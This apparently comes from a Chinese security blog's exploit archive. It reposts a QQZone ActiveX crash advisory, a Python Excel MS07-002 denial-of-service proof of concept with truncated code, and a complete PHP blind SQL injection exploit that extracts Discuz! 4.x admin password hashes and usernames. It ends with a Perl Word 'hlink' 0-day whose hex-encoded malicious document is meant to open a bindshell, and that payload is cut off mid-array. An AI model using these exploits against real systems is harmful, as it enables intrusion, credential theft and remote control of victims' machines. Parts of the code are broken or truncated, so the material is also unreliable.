    if(sqlject($sql)) return $hashtable[$tmp];
}
crack($i);
}
?>

分类: 矩阵毒刺 标签:

Tencent QQ QQzone WebCtrl Activex空指针引用漏洞(0day)

2007年3月15日 没有评论 39 views

作者:by axis(axis_at_ph4nt0m.org) 来源:http://www.ph4nt0m.org

by axis(axis_at_ph4nt0m.org)
http://www.ph4nt0m.org



摘要:

QQ是由Tencent公司开发的一个IM软件,在中国有着非常广泛的用户。幻影旅团的axis发现了一个QQZone的activex漏洞。在使用WebCtrl

方法时,将引用一个空指针,造成ie崩溃。由于该activex没有标记为safe,故会出现安全提示。

影响版本:

Tencent QQ2006/2007及之前所有版本。

by axis(axis_at_ph4nt0m.org)
http://www.ph4nt0m.org

Date: 2007-02-13

摘要:

QQ是由Tencent公司开发的一个IM软件,在中国有着非常广泛的用户。幻影旅团的axis发现了一个QQZone的activex漏洞。在使用WebCtrl

方法时,将引用一个空指针,造成ie崩溃。由于该activex没有标记为safe,故会出现安全提示。

影响版本:

Tencent QQ2006/2007及之前所有版本。

细节:

在\Tencent\QQ\QZone\TWebCtrl.dll中,使用Navigate方法时,将造成一个空指针引用
051024C0 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
051024C4 8B5424 08 MOV EDX,DWORD PTR SS:[ESP+8]
051024C8 6A 00 PUSH 0
051024CA 6A 00 PUSH 0
051024CC 8B80 B8000000 MOV EAX,DWORD PTR DS:[EAX+B8]
051024D2 6A 00 PUSH 0
051024D4 6A 00 PUSH 0
051024D6 52 PUSH EDX
051024D7 8B08 MOV ECX,DWORD PTR DS:[EAX]
此时EAX为null

幻影旅团将对此发布一个POC代码,请勿将此作为非法用途

POC:





建议:

禁止ie执行activex

厂商补丁:
目前厂商没有发布补丁

http://www.qq.com

关于Ph4nt0m:
Ph4nt0m是国内的一个安全组织,由一群来自五湖四海的朋友,因为共同热爱网络安全而走到一起来。
欢迎访问我们的网站http://www.ph4nt0m.org

分类: 矩阵毒刺 标签:

MS07-002 EXCEL Malformed Palette Record

2007年1月31日 没有评论 44 views

"""
MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC

######
Author
######
LifeAsaGeek at gmail.com
... and Microsoft said that vuln credit is for Greg MacManus of iDefense Labs

########################
Vulnerablity Description
########################
Bound error occurs when parsing Palette Record and it causes Heap Overflow
check out here - http://picasaweb.google.com/lifeasageek/MS07002/photo?pli=1#5022146178204021506
which is generated by DarunGrim
( and I want to say I'm not a person who made this analyzer ==; )

#############
Attack Vector
#############
Arbitary Data will be overwritten to the heap, but arbitary data is highly depends on the stack status !
Result of heap overflow, you can overwrite 2 bytes to restricted range address ( not anywhere )
In *CERTAIN* environment( such as open excel file which is already opened)
you can catch the flow by modify function pointer, but it doesn't have a reliablity at all
Let me know if you have a good method to break down

######
Result
######
DOS

#####
Notes
#####
You should modify pyExcelerator module because it doesn't generate Palette Record

pyExcelerator diff results would be like below

diff h:\study\pyexcelerator-0.6.3a\pyExcelerator-0.6.3a\build\lib\pyExcelerator\BIFFRecords.py pyExcelerator\BIFFRecords.py
1104a1105,1108
> def __init__(self):
> BiffRecord.__init__(self)
> self._rec_data = pack('> self._rec_data += 'A' * 0xe0
diff h:\study\pyexcelerator-0.6.3a\pyExcelerator-0.6.3a\build\lib\pyExcelerator\Workbook.py pyExcelerator\Workbook.py
468,469c468
< result = ''
< return result
---
> return BIFFRecords.PaletteRecord().get()

!! THIS IS ONLY FOR EDUCATIONAL PURPOSE !!
- 2007.01.25
"""

import sys, os
from struct import *
from pyExcelerator import *

def CreateXLS():
w = Workbook()
ws = w.add_sheet('MS07-002 POC')
w.save( "before.xls")


def ModifyXLS():
try:
f = open( "before.xls", "rb")
except:
print "File Open Error ! "
sys.exit(0)

str = f.read()
f.close()

#write to malformed xls file
f = open( "after.xls", "wb")

PaletteRecord = pack( " NewPaletteRecord = pack( "
palette_idx = str.find( PaletteRecord)

if palette_idx == -1:
print "Cannot find Palette Record"
sys.exit(0)

str = str.replace( PaletteRecord, NewPaletteRecord)
f.write( str)
f.close()

if __name__ == "__main__":
print "==========================================================="
print "MS07-002 Malformed Palette Record vulnerability DOS POC "
print "Create POC Excel File after.xls"
print "by LifeAsaGeek at gmail.com"
print "==========================================================="
CreateXLS()
ModifyXLS()


分类: 矩阵毒刺 标签:

Discuz! 4.x SQL injection / admin exploit

2006年11月18日 没有评论 40 views

<?php
print_r('
---------------------------------------------------------------------------
Discuz! 4.x SQL injection / admin credentials disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dork: "powered by discuz!
---------------------------------------------------------------------------
');
if ($argc<3) {
 print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to discuz
Options:
 -p[port]: specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /discuz/ -P1.1.1.1:80
php '.$argv[0].' localhost /discuz/ -p81
---------------------------------------------------------------------------
');
 die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
 $result='';$exa='';$cont=0;
 for ($i=0; $i<=strlen($string)-1; $i++)
 {
 if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
 {$result.=" .";}
 else
 {$result.=" ".$string[$i];}
 if (strlen(dechex(ord($string[$i])))==2)
 {$exa.=" ".dechex(ord($string[$i]));}
 else
 {$exa.=" 0".dechex(ord($string[$i]));}
 $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
 }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
{
 global $proxy, $host, $port, $html, $proxy_regex;
 if ($proxy=='') {
 $ock=fsockopen(gethostbyname($host),$port);
 if (!$ock) {
 echo 'No response from '.$host.':'.$port; die;
 }
 }
 else {
  $c = preg_match($proxy_regex,$proxy);
 if (!$c) {
 echo 'Not a valid proxy...';die;
 }
 $parts=explode(':',$proxy);
 echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
 $ock=fsockopen($parts[0],$parts[1]);
 if (!$ock) {
 echo 'No response from proxy...';die;
  }
 }
 fputs($ock,$packet);
 if ($proxy=='') {
 $html='';
 while (!feof($ock)) {
 $html.=fgets($ock);
 }
 }
 else {
 $html='';
 while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
 $html.=fread($ock,1);
 }
 }
 fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
 $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
 $proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

echo "please wait...\n";

//from global.func.php
function authcode($string, $operation, $key = '') {
  $key = $key ? $key : $GLOBALS['discuz_auth_key'];
  $coded = '';
  $keylength = 32;
  $string = $operation == 'DECODE' ? base64_decode($string) : $string;
   for($i = 0; $i < strlen($string); $i += 32) {
    $coded .= substr($string, $i, 32) ^ $key;
  }
  $coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded;
  return $coded;
}

//stolen from install.php
function random($length) {
  $hash = '';
  $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
  $max = strlen($chars) - 1;
  mt_srand((double)microtime() * 1000000);
  for($i = 0; $i < $length; $i++) {
    $hash .= $chars[mt_rand(0, $max)];
  }
  return $hash;
}

$agent="Googlebot/2.1";
//see sql errors... you need auth key,
//it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;)
$tt="";for ($i=0; $i<=255; $i++){$tt.=chr($i);}
while (1)
{
 $discuz_auth_key=random(32);
 $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
 $packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof
 $packet.="User-Agent: $agent\r\n";
 $packet.="Host: ".$host."\r\n";
 $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$tt,"ENCODE").";\r\n";
 $packet.="Accept: text/plain\r\n";
 $packet.="Connection: Close\r\n\r\n";
 $packet.=$data;
 sendpacketii($packet);
 $html=html_entity_decode($html);
 $html=str_replace("<br />","",$html);
 $t=explode("AND m.password='",$html);
 $t2=explode("' ",$t[1]);
 $pwd_f=$t2[0];
 $t=explode("AND m.secques='",$html);
 $t2=explode("'\n",$t[1]);
 $secques_f=$t2[0];
 $t=explode("AND m.uid='",$html);
 $t2=explode("'\x0d",$t[1]);
 $uid_f=$t2[0];
 $my_string=$pwd_f."\t".$secques_f."\t".$uid_f;
 if ((strlen($my_string)==270) and (!eregi("=",$my_string))){
 break;
 }
}
$temp = authcode("suntzu\tsuntzu\t".$tt,"ENCODE");
//calculating key...
$key="";
for ($j=0; $j<32; $j++){
 for ($i=0; $i<255; $i++){
 $aa="";
 if ($j<>0){
 for ($k=1; $k<=$j; $k++){
 $aa.="a";
 }
 }
 $GLOBALS['discuz_auth_key']=$aa.chr($i);
 $t = authcode($temp,"DECODE");
 if ($t[$j]==$my_string[$j]){
 $key.=chr($i);
 }
 }
}

//echo "AUTH KEY ->".$key."\r\n";
$GLOBALS['discuz_auth_key']=$key;

echo "pwd hash (md5) -> ";
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
 for ($i=0; $i<=255; $i++)
 {
 if (in_array($i,$chars))
 {
 //you can use every char because of base64_decode()...so this&nbs
p;bypass magic quotes...
 //and some help by extract() to overwrite vars
 $sql="999999'/**/UNION/**/Select/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/Where/**/adminid=1/**/LIMIT/**/1/*";
 $packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
 $packet.="User-Agent: $agent\r\n";
 $packet.="CLIENT-IP: 1.2.3.4\r\n";
 $packet.="Host: ".$host."\r\n";
 $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
 $packet.="Accept: text/plain\r\n";
 $packet.="Connection: Close\r\n\r\n";
 $packet.=$data;
 sendpacketii($packet);
 if (eregi("action=groupexpiry",$html)){
 $password.=chr($i);echo chr($i);sleep(1);break;
 }
 }
 if ($i==255) {
 die("\nExploit failed...");
 }
 }
$j++;
}

echo "\nadmin user -> ";
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
 for ($i=0; $i<=255; $i++)
 {
 $sql="999999'/**/UNION/**/Select/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/Where/**/adminid=1/**/LIMIT/**/1/*";
 $packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
 $packet.="User-Agent: $agent\r\n";
 $packet.="CLIENT-IP: 1.2.3.4\r\n";
 $packet.="Host: ".$host."\r\n";
 $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
 $packet.="Accept: text/plain\r\n";
 $packet.="Connection: Close\r\n\r\n";
 $packet.=$data;
 sendpacketii($packet);
 if (eregi("action=groupexpiry",$html)){
 $admin.=chr($i);echo chr($i);sleep(1);break;
 }
 if ($i==255) {die("\nExploit failed...");}
 }
$j++;
}

function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

if (is_hash($password)) {
 echo "exploit succeeded...";
}
else {
 echo "exploit failed...";
}
?>


注入可得到admin user and psw
其实5.0.0 GBK版本的EXP利用方法也类似

分类: 矩阵毒刺 标签:

Microsoft Word 2000/2003 Local Buffer Overflow Exp

2006年11月6日 没有评论 52 views

#!/bin/perl
#
# Microsoft Word hlink 0-day by SYS 49152

# this POC works only with:
# win 2ksp4 ENG + word 2000/XP all versions. 
# win XP ENG sp1/sp2 + word XP 2002 SP3.
#
# Word 2003 is not vulnerable.
#
# bindshell on port 49152

# hey kids.. I hope you know how to use winzip :-)
#
# to get in contact with me.. gforce@operamail.com
# I always like to talk with skilled people.. 


my $all = "\x50\x4B\x03\x04\x14\x00\x00\x00\x08\x00\x99\x3D\xE9\x34\xD6\xA6\xCB\xA3\xA9\x0D\x00\x00\x00\x72\x00\x00\x0D\x00\x00\x00\x77\x6F\x72\x64\x68\x6C".
"\x69\x6E\x6B\x2E\x64\x6F\x63\xED\x5D\x0B\x70\x54\xD5\x19\xFE\xEF\x3E\x42\x36\xC9\x62\x48\x42\x40\xC4\x70\xC1\xA0\xE1\x91\x64\x93\x00\x42\x50\x0C".
"\x49\x40\x12\x5E\x09\x01\x91\xE9\xD4\xB0\x64\x77\xB3\x1B\x36\xBB\xCB\xEE\x46\x12\xB5\xD3\xB4\x56\x84\x2E\x3A\xB1\xD4\xB1\x8E\xF8\x6A\xE9\x60\x05".
"\x3A\x58\xDB\x19\xA6\xE3\xB4\xF8\x9E\x56\xAB\x69\x3B\x52\x6D\x3B\x0C\xA2\x54\x2D\x6A\x91\x50\x29\x33\xCA\xED\xF7\xDF\x73\x6F\xB2\x6C\x08\x4B\x22".
"\x0C\xAF\xFB\x9D\xF9\xEE\x79\xDE\xFF\x3F\xE7\xDC\x73\xEF\x79\xEC\x39\x49\xF7\xDB\x23\x0E\x3C\xFD\xDC\x98\xF7\x29\x01\x73\xC8\x4C\x27\x15\x1B\xA5".
"\xC4\x85\x49\xE0\x34\xDD\x93\x49\x34\x43\x0B\x3B\xA9\x28\x0A\x07\x95\x81\x8A\x81\x4B\x0A\x9F\xFE\xFC\x45\xB2\x56\xD8\x2C\x44\xFF\xCB\xFA\x7D\xEF".
"\x93\x05\xF0\xE0\xCB\xB3\x89\x86\xD3\x9A\x96\x35\x2D\x9F\xCF\xFF\x7C\x3E\xF5\x83\xCD\x92\x4B\x85\x63\x88\x36\x4F\x15\x2C\x4F\xEF\x9F\x26\x1E\x8A".
"\x72\x55\x52\xB7\x8E\x8D\xEA\xF5\x05\x13\xF5\xDA\xF1\xEE\x81\xEC\x9C\x38\x09\xDD\x5A\xF8\x8F\xAD\x03\xDB\x19\xB0\x9F\xD2\x6C\x3D\xFD\x93\xC3\x88".
"\x8E\xA2\x59\xEF\x41\x78\x01\xFC\x07\xB4\xF4\x83\xB5\xF3\x20\x87\x45\xCA\xC3\x84\xFF\x6C\xEC\x7C\xD8\x0F\xD9\x88\x96\xE1\xC6\x0F\x50\x9B\x95\xF0".
"\x57\x23\x7C\x24\xF5\x87\x5E\x6E\x5D\x5F\x22\x92\xE5\xAF\x7A\xD8\xA9\xE9\x13\xEB\x33\x51\xAE\xEE\x5F\x85\xFB\x72\x61\xFF\x4B\xFB\x34\x24\xDA\x9C".
"\x8E\x1B\x4B\xA2\x9C\x44\x7F\x5E\x82\x7E\xFD\xFE\xC1\xE2\x6C\xE5\xE9\xFE\xC4\x72\x0E\x15\xF1\xE5\x65\xEC\xD4\xDA\x51\x45\x75\xB0\xDC\xF3\xB3\xD7".
"\x24\x3D\x9D\xDE\xDE\xAE\x47\xFA\x07\xA9\x7F\xBE\xF4\x7C\x07\x61\x3B\x48\xB4\x3F\x8A\x4B\x37\x31\x43\xD8\xBF\x86\x7F\x6C\x9C\x3F\x51\x8E\xDE\x7E".
"\xBB\x13\xCA\x37\x90\x9D\x08\x5D\xAE\x0E\x3D\x1D\xEB\x99\x49\xFD\xDB\x4F\x62\xF9\x07\x6A\x87\x89\x48\xD6\x1E\x75\x3B\xBE\x3C\xAF\x98\xFA\xEA\x51".
"\x47\x77\x8A\x68\x87\x89\xE5\xD6\xD3\x99\x48\xEA\x7D\x06\x06\x0C\x18\x38\x1D\xB2\xE5\x05\xAB\xEA\xE6\x2D\x5B\x54\xB3\x64\xA1\x3C\xC1\x1B\x8D\x86".
"\xCA\x8B\x8B\x9D\x67\x05\xD7\x65\x04\xB7\x81\x73\x0E\x8F\x81\x0B\x86\xE6\xF3\x8C\x0B\xA8\xDA\xC0\x59\xC0\x6B\xC0\x40\x12\xF8\x0C\xA8\x58\x9B\x2C".
"\xC1\x40\x28\x9E\x20\xE5\x04\xFD\xFE\x8E\xF1\x23\x23\x5E\x5F\x74\xBC\xDC\xB0\xAA\x41\x9E\x36\xAB\x64\x7A\xA9\x6C\x5B\xEC\x6B\x0A\x07\x23\x41\x4F".
"\x54\x5E\x19\x0C\xBB\x64\xAF\xDF\x17\x58\x2B\x3B\x0A\x5D\xCE\x0E\xBB\x7D\x8D\x2F\xE0\x8A\x78\xDD\x7E\xBF\x1C\x0C\xC8\xA1\x60\x38\xAA\xDD\x64\xB7".
"\x37\xF9\x7D\x4D\x6B\x39\x54\x95\x2A\x17\xD8\xED\x51\xAF\x2F\x22\xD7\x2D\xAD\x92\xD7\x07\xC3\x6B\x23\x88\xF2\x77\xC8\xEB\x7D\x51\x6F\xB9\x7D\xA5".
"\x2F\x20\x97\xAE\x8D\x84\xA6\xC9\xF3\x96\xDC\x2A\x4F\x11\x7A\x4A\x1D\x0E\x47\xF1\xED\x75\xB2\x13\xC2\xEF\x74\x87\x23\xBE\x60\x20\x52\xA4\x26\x45".
"\x60\x24\x54\x52\x1C\x09\x95\xC6\xA7\x47\x28\x6E\x29\x45\x54\x59\x91\xDD\xAE\x8B\x28\x93\xA1\x34\x10\x8C\xCA\x77\xB6\xF9\x03\xEE\xB0\x73\x8D\xDF".
"\x8D\xD8\x68\x50\x6E\x76\x47\x65\xC8\x6A\x0A\x06\xA2\xCE\xA6\xA8\x9A\x11\xB9\xD5\x5D\x54\x24\x9F\x32\x88\x6C\x75\xFA\xFC\xD1\x60\x79\xB3\x27\x18".
"\x6E\x72\x57\x04\x43\x90\xC0\x41\x45\x4D\xC1\xD6\x09\xB2\x94\x73\xBA\xF0\x91\x76\x7B\x24\xEA\xEC\x90\xA3\x6D\x01\xB7\x0B\xF2\x64\xB9\x35\x18\x76".
"\x43\x57\xD4\x1D\x76\x47\xA2\xBE\x40\xB3\x8C\x9A\x08\x34\x47\x64\x27\x82\x51\x41\x51\xAF\x5B\x5E\x8F\x1B\x90\x56\xAB\xA4\xA6\xA0\xCB\xCD\xF9\x86".
"\x74\xD9\xED\x6A\x6B\x72\x46\x51\x78\xA7\x5F\x0E\xB5\x85\x43\xC1\x88\x5B\xAD\xBA\xA9\x72\x8D\xEC\x0A\x06\x7E\x14\xE5\x0A\x0A\xAE\x97\x9D\x81\x8E".
"\x60\xC0\x2D\xA3\x64\x6D\x48\xE1\x43\x70\xB3\xD3\x17\x88\x44\xE5\xB9\x4B\x56\xC9\x7E\xE7\x7A\x94\xBA\x12\xEA\xE5\x65\xEE\x66\x67\xD8\x15\x91\xE1".
"\xEF\x7D\xC6\x76\x7B\xB2\x91\xF5\x25\x02\xCC\xA2\xA5\x54\xA2\x9B\x47\x10\xCD\x01\x6F\x01\xAB\xC1\x79\xE0\x0A\xD0\x0D\xB6\x80\x8F\x81\x5B\xC1\x27".
"\xC0\xED\xE0\x41\xF0\x03\xF0\x28\xF8\x25\x98\x96\x45\x94\x0E\x16\x80\xF3\xC0\xF9\x60\x10\x0C\x81\xEB\xC0\xFB\xC0\x0D\xE0\xB8\x6C\xA2\xC2\x6C\xB1".
"\xB6\x78\xBC\xE7\xE3\xE3\x07\x8F\xEF\xFF\xFB\xFE\x9E\xBF\xF6\xBC\xBD\xBF\x67\xFF\x1B\xFB\x71\x3D\xDE\xB3\x17\x81\x3D\x2F\xF4\x24\xCB\xF8\xA5\x8D".
"\x94\x5C\xEF\x86\xD5\x0A\xD1\x48\x53\xEA\xF7\xCC\x2D\x7F\x46\xCD\xA4\xA4\x4A\xB9\xDE\xED\x95\x5B\x68\x45\xAA\x84\x58\x4B\xEA\xFB\x6A\xAA\x07\x26".
"\xFE\x8E\x28\xC3\xD6\x62\xA6\xDA\x23\x22\x9E\x43\xEF\x2C\xAC\x51\xED\xC6\x75\x8F\xA2\xEE\x45\xB8\xA3\x36\x53\x97\xA7\x6A\x38\x55\x9E\x7A\xE7\x55".
"\x22\xAA\x37\x9C\xF2\xF8\xF9\xAF\xC3\xF3\x0B\x83\x31\x70\x33\xF8\xB8\xF6\x9C\xF7\x68\xCF\x38\xFE\xD9\x4E\x02\xEF\x07\x37\x82\x2F\x81\x2F\x83\x79".
"\xD9\xE2\xB9\x16\x81\xC5\xE0\x2C\xED\xF9\x7E\x1D\x5F\x60\xC3\x93\xE0\xB9\xE0\xE0\xD5\xB1\x5C\x7D\x9D\xFF\xE2\xCA\x9A\x81\xF3\x0F\x8B\x85\x24\x49".
"\x9A\x42\x25\x5D\x5E\x69\xB6\xC3\x34\x6E\x77\x77\xB1\xBC\xFB\xC0\xCD\xE3\x77\x07\x2C\x13\xC0\xEB\xBA\x02\x96\x7C\x70\xE2\x6E\xA2\x51\xF0\x8F\x06".
"\x93\x89\x34\x70\xC9\x81\x7B\x9E\xEA\x64\x89\x92\xA1\xFB\x0F\xFF\xEE\x38\xF1\xDB\xB7\x46\x6C\xFE\x3E\x3D\x4B\x0B\x7F\x91\xCE\x2B\xF1\x66\xF0\x40".
"\x42\xF8\x6A\x28\xF3\x52\x14\x26\x44\xE5\x54\x0C\xE3\x3C\x87\xC6\x65\x98\x8B\xD2\xB8\x0D\x63\x98\x4B\xC0\x78\x0C\x63\x98\x2B\xD0\x34\x5F\xE2\x26".
"\x59\xF9\x2E\xCF\x52\x1B\xC6\x30\xE7\xC6\x78\x0D\x63\x18\xC3\x9C\x67\x73\x38\xAD\xAB\x6B\xF1\x81\xE7\x1C\xAA\x3B\xA5\xAB\xCB\x53\xBB\xE4\x9E\xAE".
"\xAE\xAF\x5A\x0E\x2F\xFE\xF8\x84\xA2\x28\xAB\x63\xFE\xFC\xFC\xD8\xBC\x9B\x62\xF7\x58\xDB\xA5\xFF\xC4\x96\x8E\x8E\x35\xCA\xD2\xE1\x9A\xD8\xB4\x98".
"\xF4\x79\xC9\xDE\x47\x77\xFE\x60\x6F\x74\xD8\x8B\x7F\xB4\x4B\x2F\x1D\x3E\x36\x7B\x79\x7E\x41\xDB\xA1\x58\x63\xBE\x74\xD8\x13\xCB\x58\x18\x6B\x1C".
"\x2B\x1D\x36\x4F\x8D\x6D\xF2\xE7\x8F\x75\xBE\x5C\xF2\x0F\x57\xAC\xCA\x11\xAB\xC8\x88\x85\xC6\xEE\x8A\x55\xA4\xDE\xE1\x7D\x70\xC9\xF0\x4F\xEB\x94".
"\x7D\x9E\x06\x8F\xB7\xAC\xD4\xBB\x3E\x52\xDA\xB8\x5C\xE9\xF6\xBE\xF1\xD9\x57\xB3\x11\xDA\xB8\xE9\x90\xE7\x7B\x9F\xA5\x9A\x56\xB4\x98\x10\xF8\x9E".
"\xED\xBF\xBB\x56\x2A\xFB\x1A\x18\x55\x30\x4A\xB7\xC7\xBB\x97\x3C\x0D\x9B\xDE\x7F\xD8\xBB\x6D\x4C\xE8\x75\xC4\xB5\x64\xD6\xAF\x40\xCA\x6D\xBB\x8A".
"\x3E\xE1\x94\xEC\x3E\x54\xB3\xA1\x06\xEE\xBA\xE5\xCB\xE1\xDB\xE2\xFD\xA8\xE3\xB5\x0E\x78\xE1\xF6\xB4\xB8\x3C\xDE\xA6\xD6\x4D\x87\x5A\xEA\x56\x4D".
"\x7A\x73\xD3\x47\x2D\xD5\x9B\x0E\x96\xEC\xED\x79\xF6\x64\x65\xE1\xC9\xCA\xA9\x5B\x1E\xB8\x6B\xE6\x8E\x1D\x3B\xBC\xE1\x93\xCF\xE7\x2A\x6D\xD5\xCA".
"\xBE\x6F\xAD\x5C\x56\x5F\x5F\xDF\x22\xD5\xD7\xAF\xA8\x87\xD8\x5D\xEF\x59\xDF\x6A\x80\x42\x45\xB9\x51\xE9\x8E\xAD\xFC\xEA\xDE\x57\x5C\xCA\xBE\x65".
"\x88\x38\xF2\x43\x4B\x23\x22\x94\x6E\xF2\x19\xE6\x22\x36\x6B\x93\xA6\x38\xD7\xA6\x98\x88\xFE\x46\xE7\x69\x41\x6B\x14\x89\x7D\xD8\x3C\xE0\x0C\x52".
"\x98\x9A\x30\x65\xAC\x80\x2B\x04\x3B\x4C\x4E\x6A\x05\x7D\xE4\xA7\x22\xC4\x04\xE1\xEB\xBF\xFC\xC5\xBB\x68\xF5\x54\x51\xA4\x29\x1F\x84\xAC\xF3\x85".
"\x1C\x94\x29\x8B\x24\xDA\x4A\x57\xA9\x4B\x76\x02\x2E\xA2\x8A\x2F\x14\x13\xEC\xBE\x4D\xC1\x29\xB4\x44\xCD\x2B\xE7\xCD\x0F\xFF\x08\xD0\x9C\x4F\x93".
"\xF3\xA5\x92\x7C\x9A\x9B\x4F\xCE\x7C\xA2\x29\x54\x39\x99\xAA\x6A\x47\xD3\xD2\x5A\x0B\xD5\xD5\x5A\xA9\x1E\xF6\x1D\xB5\x29\xD4\xB8\x40\x21\x67\x6D".
"\x0E\xB5\x2E\xB0\x59\x22\x60\x74\x81\xD2\x3F
\x2F\xFC\xE0\xE6\xD2\x51\xE5\x69\xD8\x19\xBD\x7B\x77\x73\xE1\xE3\xC9\xB9\x93\xDA\xD4\x7A\x93\xA9\x0E".
"\x6E\xAE\xA5\x66\xF5\x1A\xC2\x07\x55\xA6\xF9\xC8\x5B\x00\xB1\x8C\xDB\x50\x77\x3D\xCA\xF3\xB0\xFB\xA4\x64\xD0\x72\xA4\x5D\x03\x09\x6E\xA4\x3E\xB5".
"\x24\x32\x95\xDF\x96\x4E\xA3\xBE\x44\xF9\xA7\xED\x4B\x21\xC9\xAA\x3B\xD2\xCC\x7E\x72\x72\xB0\x89\xF8\x68\x43\x01\x9A\xF4\x31\xE5\x45\x3E\x15\xD0".
"\x2B\x77\x98\x2A\x4B\xA6\x45\xD0\x19\x51\xF5\x9B\xB4\x3A\xAB\xA5\x93\x4B\x8F\x2A\x5F\xC0\xEE\xAB\xC3\xAB\x51\xBE\x35\x48\xE7\x44\xCA\xBB\xA8\x90".
"\x1A\x60\x3B\x91\x6F\x97\x5A\x22\x17\x62\x9A\x50\x9A\x30\x64\x79\xD4\x98\xB0\x56\xA2\x19\xB4\xA2\xE2\xA8\x22\x49\x33\xE2\x64\xD9\x68\x01\x75\x68".
"\x2D\xC6\x8F\x3B\x02\xC8\x1D\x97\xB3\x72\xB2\x2D\xE4\x25\xEA\xA4\x39\x93\x91\xBE\xB2\x42\xA2\xAC\x84\xFB\x2A\x91\x63\x17\xEE\x95\x51\x27\x6E\x6A".
"\x57\x75\xA4\xE1\x79\x66\x6F\x43\x7B\xD8\xD6\x4E\x5C\xD2\xE2\x8A\x11\xD2\x04\xA9\x20\xEE\x3E\xCB\x29\x65\xCC\x22\xF1\x60\xB9\x94\x12\x95\x4A\xF1".
"\xA5\x4C\xA5\x2A\xF5\xB9\x44\x91\x9E\x9F\x4A\x09\xC2\xEC\x94\x0D\xF9\xED\xAA\xFC\x8C\x7C\xE4\x89\x66\xA4\x4A\x55\x68\x11\xDF\x4E\x95\x58\x0E\x37".
"\x8E\x22\x55\x56\xA5\x54\x14\x27\xCB\x4A\x35\x6A\xFD\x70\x3E\xD9\x97\xA3\xDE\x2D\x74\x33\xF8\xCC\x09\x5C\x63\x38\x7F\x7C\x9E\x85\xC3\xD6\xD9\x88".
"\xC2\x60\x0C\xDC\x0C\x3E\x0E\x3E\x01\xEE\x01\x3F\x00\xD3\xD2\x88\xD2\xC1\x02\x70\x12\x78\x3F\xB8\x11\x7C\x09\x7C\x19\xCC\x83\xCC\x71\x60\x11\x58".
"\x0C\xCE\x02\x6F\x02\x7F\xC2\xC2\x1D\x5A\xC6\x3A\x35\x6A\x18\x74\x5C\xEA\x45\x14\x47\x67\x88\x3B\xD3\x7D\x8E\x21\xC6\xC9\xC2\x73\x4E\xF3\x92\x79".
"\x86\x38\x59\x78\xCE\xA9\xCC\xF3\x78\x9F\xFE\x9B\x6C\x5A\x9C\x3B\x3D\xCE\xAD\xBF\x1D\x73\xD0\x96\xAB\xC1\x79\x48\x18\x02\xEF\x4B\x13\xEF\x43\xF6".
"\xED\x39\xCA\xC8\x4E\x71\xE5\x74\xB7\x20\x4D\x0D\xE8\x06\x5B\xC0\xB5\x60\x48\x7B\x47\xEE\x06\x1F\x06\x1F\xB5\x89\x36\x3E\x8C\xC6\x6A\xB4\xC4\xB9".
"\x75\x29\x55\xAC\x4D\x93\xB6\xD0\xD6\xF7\xA6\xDD\xAD\xBD\x69\x0F\x69\x6F\xDA\x4F\x6D\xE2\xCD\x9A\xA2\xBD\x59\x9B\xC1\x47\xC0\xC7\xB4\x37\xEC\x75".
"\x30\x1F\xDA\x0A\xD3\x75\xAD\x65\x1A\x2D\x71\xEE\x81\xC8\x08\x69\x65\xD0\xDF\x4D\x33\xEE\x34\x6B\x71\x7A\xF9\x84\x64\x96\xC8\x95\x6E\x21\x51\xF9".
